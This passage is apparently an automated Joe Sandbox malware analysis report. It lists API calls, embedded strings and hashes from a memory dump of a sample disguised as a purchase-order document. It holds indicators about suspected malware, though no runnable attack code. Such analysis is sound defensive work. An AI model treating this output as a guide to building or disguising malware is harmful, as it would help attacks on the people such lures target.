                                                              • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                              • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                              • _snwprintf.MSVCRT ref: 0040977D
                                                              • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 313946961-1552265934
                                                              • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                              • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              • API String ID: 0-1953309616
                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                              APIs
                                                              Strings
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                              APIs
                                                              • memset.MSVCRT ref: 0044A6EB
                                                              • memset.MSVCRT ref: 0044A6FB
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                              • free.MSVCRT ref: 0040E9D3
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • free.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$PlacementWindow
                                                              • String ID: AE
                                                              • API String ID: 3548547718-685266089
                                                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _memicmpwcslen
                                                              • String ID: @@@@$History
                                                              • API String ID: 1872909662-685208920
                                                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                              APIs
                                                              • memset.MSVCRT ref: 004100FB
                                                              • memset.MSVCRT ref: 00410112
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 00410141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                              • String ID: </%s>
                                                              • API String ID: 3400436232-259020660
                                                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: AE$"
                                                              • API String ID: 568519121-1989281832
                                                              • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D58D
                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                              • String ID: caption
                                                              • API String ID: 1523050162-4135340389
                                                              • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                              • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                              APIs
                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 210187428-168460110
                                                              • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                              • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcsicmpmemset
                                                              • String ID: edit
                                                              • API String ID: 2747424523-2167791130
                                                              • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                              • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
